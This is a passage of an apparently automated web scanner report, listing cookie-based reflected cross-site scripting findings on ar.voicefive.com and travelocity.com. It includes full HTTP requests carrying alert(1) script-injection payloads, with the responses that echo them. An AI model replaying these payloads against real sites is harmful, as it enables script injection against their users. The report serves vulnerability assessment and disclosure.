P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
Oct 3 00:00:22 2011&recExp=Mon Oct 3 00:00:22 2011&prad=71054945&arc=43921374&', "ar_p63514475": 'exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&f07ef<script>alert(1)</script>367a49a45ca' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "www.Doralinks.com|www.PetNamesWorld.com|www.BigGreenHelp.com|www.HotelForDogsMovie.com|www.MundoNick.com|www.iCarly.com|www.MundoBob.com|www
...[SNIP]...
4.426. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 66202<script>alert(1)</script>d3f1810a83f was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&66202<script>alert(1)</script>d3f1810a83f; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:32 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=63&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:32 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:32 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
:00:27 2011&recExp=Mon Oct 3 00:00:27 2011&prad=71054945&arc=43921374&', "ar_p81479006": 'exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&66202<script>alert(1)</script>d3f1810a83f', "ar_p119936314a1373
7b0e12d06b6": 'exp=1&initExp=Mon Oct 3 00:00:27 2011&recExp=Mon Oct 3 00:00:27 2011&prad=71054945&arc=43921374&', "ar_eaf36
effc3501f28": 'exp=1&initExp=Mon Oct 3 00:00:26
...[SNIP]...
4.427. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload bc647<script>alert(1)</script>e4cffefecec was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&bc647<script>alert(1)</script>e4cffefecec; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=93&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:36 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
t Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&', "ar_p82806590": 'exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&bc647<script>alert(1)</script>e4cffefecec', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C'
...[SNIP]...
4.428. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload a2c69<script>alert(1)</script>54e7f06ae4f was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&a2c69<script>alert(1)</script>54e7f06ae4f; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:31 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=57&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:31 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:31 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
7 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&a2c69<script>alert(1)</script>54e7f06ae4f', "UID": '9cc29993-80.67.74.150-1314836282', "ar_72bcd37b8f9f0348a793175": 'exp=1&initExp=Mon Oct 3 00:00:22 2011&recExp=Mon Oct 3 00:00:22 2011&prad=71054945&arc=43921374&', "BMX_3PC": '1', "ar
...[SNIP]...
4.429. http://www.travelocity.com/ [SID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /

Issue detail

The value of the SID cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98d7f"%3balert(1)//3adafe414fa was submitted in the SID cookie. This input was echoed as 98d7f";alert(1)//3adafe414fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/resolve/default
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X40111838017053324902341610298d7f"%3balert(1)//3adafe414fa; TVLY_LOCALE=us

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:21 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 176582
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:21 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE]><![endif]-->
<html x
...[SNIP]...
ravel.travelocity.com/___waseq.img",terms_link:{url:"http://www.travelocity.com/info/info_popup/0,,TRAVELOCITY:EN|TERMS_WINDOW,00.html",width:500,height:400},SID:"T000V00000X40111838017053324902341610298d7f";alert(1)//3adafe414fa",JSID:"B06A01B9A68546F4275CFAA93A036D71.p0251",servicetag:"TRAVELOCITY"};Subscriptions.PopupConfig = {urls:{SignUpPopup:"http://www.travelocity.com/subscription-management/submgmt-popup"},height:450};
...[SNIP]...
4.430. http://www.travelocity.com/ [TVLY_GEO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /

Issue detail

The value of the TVLY_GEO cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f61f'%3balert(1)//6bcab64e5e3 was submitted in the TVLY_GEO cookie. This input was echoed as 3f61f';alert(1)//6bcab64e5e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/resolve/default
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||3f61f'%3balert(1)//6bcab64e5e3; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:05 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 176582
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:05 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE]><![endif]-->
<html x
...[SNIP]...
tDeals, function(){
           jQuery(document).bind('travelDeals:ready', function(){
               new deals.VacationDeals({
                   cookies: {
                       LastShopCookie : '',
                       PrefLocCookie : '',
                       geoCookie : '|||||3f61f';alert(1)//6bcab64e5e3'
                   }
               });
           });
       });
       
       
           var dDeals = ["http://i.travelpn.com.edgesuite.net/js/hp-dashing-deal.js"];
           jQuery.tvly.loadScript(dDeals, function(){
               jQuery(document).bind('DealsOfTheDay
...[SNIP]...
4.431. http://www.travelocity.com/472a [SID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /472a

Issue detail

The value of the SID cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf501"%3balert(1)//7adedfc3e61 was submitted in the SID cookie. This input was echoed as cf501";alert(1)//7adedfc3e61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /472a HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102cf501"%3balert(1)//7adedfc3e61; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 178482
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:45 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
ravel.travelocity.com/___waseq.img",terms_link:{url:"http://www.travelocity.com/info/info_popup/0,,TRAVELOCITY:EN|TERMS_WINDOW,00.html",width:500,height:400},SID:"T000V00000X401118380170533249023416102cf501";alert(1)//7adedfc3e61",JSID:"42CFE143BC5897E1472EDA5550B9A7D9.p0741",servicetag:"TRAVELOCITY"};Subscriptions.PopupConfig = {urls:{SignUpPopup:"http://www.travelocity.com/subscription-management/submgmt-popup"},height:450};
...[SNIP]...
4.432. http://www.travelocity.com/472a [TVLY_GEO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /472a

Issue detail

The value of the TVLY_GEO cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86264'%3balert(1)//a77be289682 was submitted in the TVLY_GEO cookie. This input was echoed as 86264';alert(1)//a77be289682 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /472a HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||86264'%3balert(1)//a77be289682; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:18 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 178482
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:18 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
tDeals, function(){
           jQuery(document).bind('travelDeals:ready', function(){
               new deals.VacationDeals({
                   cookies: {
                       LastShopCookie : '',
                       PrefLocCookie : '',
                       geoCookie : '|||||86264';alert(1)//a77be289682'
                   }
               });
           });
       });
       
       
                   var dDeals = ["http://i.travelpn.com/js/hp-dashing-deal.js"];
           jQuery.tvly.loadScript(dDeals, function(){
               jQuery(document).bind('DealsOfTheDay:ready', fu
...[SNIP]...
4.433. http://www.travelocity.com/resolve/default [SID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /resolve/default

Issue detail

The value of the SID cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2139d"%3balert(1)//42f8578f032 was submitted in the SID cookie. This input was echoed as 2139d";alert(1)//42f8578f032 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /resolve/default HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://www.travelocity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/resolve/default
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=2139d"%3balert(1)//42f8578f032

rememberCheck=us&selectedFlag=us&continue=Continue

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:57 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 176603
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:57 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE]><![endif]-->
<html x
...[SNIP]...
e",maxRetries:10,sVSTrackUrl:"http://travel.travelocity.com/___waseq.img",terms_link:{url:"http://www.travelocity.com/info/info_popup/0,,TRAVELOCITY:EN|TERMS_WINDOW,00.html",width:500,height:400},SID:"2139d";alert(1)//42f8578f032",JSID:"",servicetag:"TRAVELOCITY"};Subscriptions.PopupConfig = {urls:{SignUpPopup:"http://www.travelocity.com/subscription-management/submgmt-popup"},height:450}; Subscriptions.SignupConfig.JSID = G
...[SNIP]...
4.434. http://www.travelocity.com/resolve/default [TVLY_GEO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /resolve/default

Issue detail

The value of the TVLY_GEO cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58978'%3balert(1)//89a7d5f99fb was submitted in the TVLY_GEO cookie. This input was echoed as 58978';alert(1)//89a7d5f99fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /resolve/default HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://www.travelocity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/resolve/default
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||58978'%3balert(1)//89a7d5f99fb; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102

rememberCheck=us&selectedFlag=us&continue=Continue

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 176582
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:42 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE]><![endif]-->
<html x
...[SNIP]...
tDeals, function(){
           jQuery(document).bind('travelDeals:ready', function(){
               new deals.VacationDeals({
                   cookies: {
                       LastShopCookie : '',
                       PrefLocCookie : '',
                       geoCookie : '|||||58978';alert(1)//89a7d5f99fb'
                   }
               });
           });
       });
       
       
           var dDeals = ["http://i.travelpn.com.edgesuite.net/js/hp-dashing-deal.js"];
           jQuery.tvly.loadScript(dDeals, function(){
               jQuery(document).bind('DealsOfTheDay
...[SNIP]...
4.435. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js [drft cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The value of the drft cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35267"-alert(1)-"a7305f10e3e was submitted in the drft cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

